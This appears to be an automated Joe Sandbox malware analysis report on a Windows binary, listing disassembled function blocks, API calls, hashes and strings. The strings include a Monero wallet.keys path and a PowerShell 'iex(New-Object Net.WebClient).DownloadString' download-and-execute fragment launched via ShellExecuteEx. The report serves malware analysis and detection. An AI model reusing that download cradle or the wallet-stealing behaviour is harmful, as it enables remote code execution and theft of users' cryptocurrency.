                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 6d5e88f72c60ce0e8769af15eefd796f2b99936d3e523e3d096e69c9b75596a9
                                        • Instruction ID: b36dbaed1cfe6067b1fae8b291de1bce4edcca2e0ac045aa7d407c54c76955c8
                                        • Opcode Fuzzy Hash: 6d5e88f72c60ce0e8769af15eefd796f2b99936d3e523e3d096e69c9b75596a9
                                        • Instruction Fuzzy Hash: 5331E3B4A4021CABDB20CF54DC85BDCB7B4AB48704F1081E9FA09B7281C6706A858F99
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CB8426
                                        • wsprintfA.USER32 ref: 00CB8459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CB847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB8499
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                        • RegQueryValueExA.ADVAPI32(00000000,009DEC88,00000000,000F003F,?,00000400), ref: 00CB84EC
                                        • lstrlen.KERNEL32(?), ref: 00CB8501
                                        • RegQueryValueExA.ADVAPI32(00000000,009DED78,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00CC0B34), ref: 00CB8599
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB8608
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB861A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 74cd1b1d9604cd70953259801a55463b9d2ae881d328b84ce8e99fdb0ef03a1b
                                        • Instruction ID: 1160afa34215dced5385368b40cf7a705eff7636f380c7eab446e50f61bef6f2
                                        • Opcode Fuzzy Hash: 74cd1b1d9604cd70953259801a55463b9d2ae881d328b84ce8e99fdb0ef03a1b
                                        • Instruction Fuzzy Hash: AF21D6B191021CAFDB24DB54DC85FE9B7B9FB48700F0485A9B609A6180DE716A89CFA4
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB76A4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB76AB
                                        • RegOpenKeyExA.ADVAPI32(80000002,009CBBE8,00000000,00020119,00000000), ref: 00CB76DD
                                        • RegQueryValueExA.ADVAPI32(00000000,009DECB8,00000000,00000000,?,000000FF), ref: 00CB76FE
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB7708
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: af3a2fe39ab491d1e5fcd1bfe99a71e102a52c8e1e18beda715c7891d79c6077
                                        • Instruction ID: 0baf489d4ffdece345d8b168635007e7229952f2a94ec177e47d130797f3572e
                                        • Opcode Fuzzy Hash: af3a2fe39ab491d1e5fcd1bfe99a71e102a52c8e1e18beda715c7891d79c6077
                                        • Instruction Fuzzy Hash: 530144B5A44208BFDB10DBE5DC8DFAD77B8EB44701F144169FE05FB290DA70A9088B51
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7734
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB773B
                                        • RegOpenKeyExA.ADVAPI32(80000002,009CBBE8,00000000,00020119,00CB76B9), ref: 00CB775B
                                        • RegQueryValueExA.ADVAPI32(00CB76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00CB777A
                                        • RegCloseKey.ADVAPI32(00CB76B9), ref: 00CB7784
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 2d82a043c6e8cf8273e7a2a5a2f8c25d16b13ed35874e18251ef85856b40802e
                                        • Instruction ID: 663f5d3596724235892f6db32a38a5005ea2550102ea375f1cf93b54a8a4088d
                                        • Opcode Fuzzy Hash: 2d82a043c6e8cf8273e7a2a5a2f8c25d16b13ed35874e18251ef85856b40802e
                                        • Instruction Fuzzy Hash: 940144B5A40308BFDB10DBE1DC8AFAEB7B8EB44701F144169FA05BB281DA7066048B51
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                        • ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                        • LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                        • CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 287fb86e5b3ed1aaaa0dcefa798b46cec0a598ac5fab43f182affcceff76e914
                                        • Instruction ID: c97d364c59bc3a8122f4f838c25181a1a73ed81483dab789f30a396f91cca122
                                        • Opcode Fuzzy Hash: 287fb86e5b3ed1aaaa0dcefa798b46cec0a598ac5fab43f182affcceff76e914
                                        • Instruction Fuzzy Hash: 3F3138B4A0020AEFDB14CF95C886BAE77B5FF49304F108159E815AB290C774AE45DFA1
                                        APIs
                                        • lstrcat.KERNEL32(?,009DEEB0), ref: 00CB47DB
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4801
                                        • lstrcat.KERNEL32(?,?), ref: 00CB4820
                                        • lstrcat.KERNEL32(?,?), ref: 00CB4834
                                        • lstrcat.KERNEL32(?,009CA7D0), ref: 00CB4847
                                        • lstrcat.KERNEL32(?,?), ref: 00CB485B
                                        • lstrcat.KERNEL32(?,009DD840), ref: 00CB486F
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CB8D90: GetFileAttributesA.KERNEL32(00000000,?,00CA1B54,?,?,00CC564C,?,?,00CC0E1F), ref: 00CB8D9F
                                          • Part of subcall function 00CB4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CB4580
                                          • Part of subcall function 00CB4570: RtlAllocateHeap.NTDLL(00000000), ref: 00CB4587
                                          • Part of subcall function 00CB4570: wsprintfA.USER32 ref: 00CB45A6
                                          • Part of subcall function 00CB4570: FindFirstFileA.KERNEL32(?,?), ref: 00CB45BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: 814b7500965a32c09c12fb894ebf9b5af60ee8bc18eefd9b96ef35efc7cb977e
                                        • Instruction ID: 98f7ec0328ceb8426e3edbc1334a94c582bb8ecc0d6f0c5730b12aa821340780
                                        • Opcode Fuzzy Hash: 814b7500965a32c09c12fb894ebf9b5af60ee8bc18eefd9b96ef35efc7cb977e
                                        • Instruction Fuzzy Hash: 553171B2D0020C6BDB14FBB0DCC6EE9737CAB58700F444599B359A6081EE74A78DDB95
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB2D85
                                        Strings
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00CB2D04
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00CB2CC4
                                        • <, xrefs: 00CB2D39
                                        • ')", xrefs: 00CB2CB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: def8880ee245dd9d87e9e27873dad393f6fc34244554e34d2495513c3f950d7c
                                        • Instruction ID: e1d0ae9d55aacbf25368f77fbd43a440510b6f22e19a380c63648821399aa2f4
                                        • Opcode Fuzzy Hash: def8880ee245dd9d87e9e27873dad393f6fc34244554e34d2495513c3f950d7c
                                        • Instruction Fuzzy Hash: E741BE71C10208AADB14EFA1C8A1FDDB778AF14300F504129F156BB1D1DF756A4AEF91
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00CA9F41
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$AllocLocal
                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                        • API String ID: 4171519190-1096346117
                                        • Opcode ID: 26a47a83be2dc7842d00b21491a0cf0bc555750a53fbb9510d67e199cde2161a
                                        • Instruction ID: f247980b31a76fe88b0c1fcfe54c28eb264df84dac3474aa90b713f6fff13ee3
                                        • Opcode Fuzzy Hash: 26a47a83be2dc7842d00b21491a0cf0bc555750a53fbb9510d67e199cde2161a
                                        • Instruction Fuzzy Hash: F8613D70900248EFDB24EFA5CC96FED77B9AF41304F048518F94A6B191DF706A05DB51
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,009DDB60,00000000,00020119,?), ref: 00CB40F4
                                        • RegQueryValueExA.ADVAPI32(?,009DEFD0,00000000,00000000,00000000,000000FF), ref: 00CB4118
                                        • RegCloseKey.ADVAPI32(?), ref: 00CB4122
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4147
                                        • lstrcat.KERNEL32(?,009DEFA0), ref: 00CB415B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 96c0e163a49e245e8e39915f95c186eb37d819181a5008dd4153b26b56445bf8
                                        • Instruction ID: c886f74cba4ce98b5151d11aec858d6a056e021c2856e8e7939bbbafdc058ca6
                                        • Opcode Fuzzy Hash: 96c0e163a49e245e8e39915f95c186eb37d819181a5008dd4153b26b56445bf8
                                        • Instruction Fuzzy Hash: 49418AB6D0014C6BDB14EBE0EC86FFE737DAB89300F04455DB6155B181EA75AB8C8B92
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00CB696C
                                        • sscanf.NTDLL ref: 00CB6999
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CB69B2
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CB69C0
                                        • ExitProcess.KERNEL32 ref: 00CB69DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: cf02a0d6fb2ee81682d49748bbb5f7ba5ed04010bfcfcb26c70916a6f5d8f0a3
                                        • Instruction ID: fcc1e577deface9426852d4607d20169e3f5cb819e8a96cd512612527b11b544
                                        • Opcode Fuzzy Hash: cf02a0d6fb2ee81682d49748bbb5f7ba5ed04010bfcfcb26c70916a6f5d8f0a3
                                        • Instruction Fuzzy Hash: 4B21BB75D1420CAFCB08EFE5D9859EEB7B5BF48300F04452EE416B7250EB346609CB69
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7E37
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7E3E
                                        • RegOpenKeyExA.ADVAPI32(80000002,009CBC58,00000000,00020119,?), ref: 00CB7E5E
                                        • RegQueryValueExA.ADVAPI32(?,009DDB20,00000000,00000000,000000FF,000000FF), ref: 00CB7E7F
                                        • RegCloseKey.ADVAPI32(?), ref: 00CB7E92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: d3b859d97f62a9b654fc42a4eb528affabcc184914e863d01d0e95efc6412bf0
                                        • Instruction ID: a15f77e00beaa1828c5bc14b5a47ced57db94d3ec240ad8655ec34a167a7f5ed
                                        • Opcode Fuzzy Hash: d3b859d97f62a9b654fc42a4eb528affabcc184914e863d01d0e95efc6412bf0
                                        • Instruction Fuzzy Hash: 721194B1A44249EFD714CFD6DC89FBBBBB8EB44701F10422DFA15AB280D77468048BA1
                                        APIs
                                        • StrStrA.SHLWAPI(009DEB98,?,?,?,00CB140C,?,009DEB98,00000000), ref: 00CB926C
                                        • lstrcpyn.KERNEL32(00EEAB88,009DEB98,009DEB98,?,00CB140C,?,009DEB98), ref: 00CB9290
                                        • lstrlen.KERNEL32(?,?,00CB140C,?,009DEB98), ref: 00CB92A7
                                        • wsprintfA.USER32 ref: 00CB92C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: cf702ab54c766079c1e2951c9e1f9c95dca2effb1ea6c93cfd1250ac672bcb1c
                                        • Instruction ID: 5fd5dd2da30e96b860053acf0b364c30ce7a5bb8d4eeade6aaf5e02ecb7634ab
                                        • Opcode Fuzzy Hash: cf702ab54c766079c1e2951c9e1f9c95dca2effb1ea6c93cfd1250ac672bcb1c
                                        • Instruction Fuzzy Hash: 0101A97550014CFFCB04DFEDC989EAE7BB9EB44355F14815CF909AB244C631AA44DB92
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CA12B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA12BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CA12D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CA12F5
                                        • RegCloseKey.ADVAPI32(?), ref: 00CA12FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: ea29e1e93a5840bc3c0360c0735dc9f5002ef2b9b165d4175857cd5687937c4f
                                        • Instruction ID: de9de548f26861904f2bcc1f309ee3b7b405e84c84945b90735807b662b98526
                                        • Opcode Fuzzy Hash: ea29e1e93a5840bc3c0360c0735dc9f5002ef2b9b165d4175857cd5687937c4f
                                        • Instruction Fuzzy Hash: 310136B5A4020CBFDB14DFD1DC89FAEB7B8EB48701F048159FA05AB280D670AA058F51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: 41cf30a04ae08e7c79ac85ea82f1dc61d7c3584d88598d1927d432a1ac49543a
                                        • Instruction ID: 4864601c7b297ff33d96ea24af9fb62e9caeff934c67b81b81a205dd0ae34cff
                                        • Opcode Fuzzy Hash: 41cf30a04ae08e7c79ac85ea82f1dc61d7c3584d88598d1927d432a1ac49543a
                                        • Instruction Fuzzy Hash: F341E6B150075C5EEB218B24CCC5FFBBBE89F45704F1444E8E99A96182E2719B45DF60
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00CB6663
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB6726
                                        • ExitProcess.KERNEL32 ref: 00CB6755
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: ed970098a0f51cf36f97502b92845e22d36451ec43c54d0159004092ae0a3dbe
                                        • Instruction ID: e63c98f80569e2f3ccfa0ae1058ca990e713d4e7f84518d230530aac9a49347f
                                        • Opcode Fuzzy Hash: ed970098a0f51cf36f97502b92845e22d36451ec43c54d0159004092ae0a3dbe
                                        • Instruction Fuzzy Hash: 743127B1C01218AEDB14EB90DC96BDEB77CAF04300F804199F20A76191DF746B48DF6A
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CC0E28,00000000,?), ref: 00CB882F
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB8836
                                        • wsprintfA.USER32 ref: 00CB8850
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 1dd8567b06e08344549dbf8f7c1a4fe1931119879060b8ddab4889eec9536bf0
                                        • Instruction ID: ba735ad40b7c8c8de0f3fd5e76166031652a2a2867382a0c23bca2466183fd9c
                                        • Opcode Fuzzy Hash: 1dd8567b06e08344549dbf8f7c1a4fe1931119879060b8ddab4889eec9536bf0
                                        • Instruction Fuzzy Hash: 372133B1A40248AFDB04DF95DD89FAEBBB8FB48701F14412DF505BB280C7796904CBA5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00CB951E,00000000), ref: 00CB8D5B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB8D62
                                        • wsprintfW.USER32 ref: 00CB8D78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 3d210bb027bb926f2dc075e66a284fc97eac401e146685eb6472ff5281639b88
                                        • Instruction ID: 8821cf790f6fb97e68c12dba4c037c3d5f6c2aa1198cac273a6ab9c623b2acdd
                                        • Opcode Fuzzy Hash: 3d210bb027bb926f2dc075e66a284fc97eac401e146685eb6472ff5281639b88
                                        • Instruction Fuzzy Hash: CBE08670A4020CFFC704DB95DC4EE597BB8EB04701F044068FD099B280D9716E048B56
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
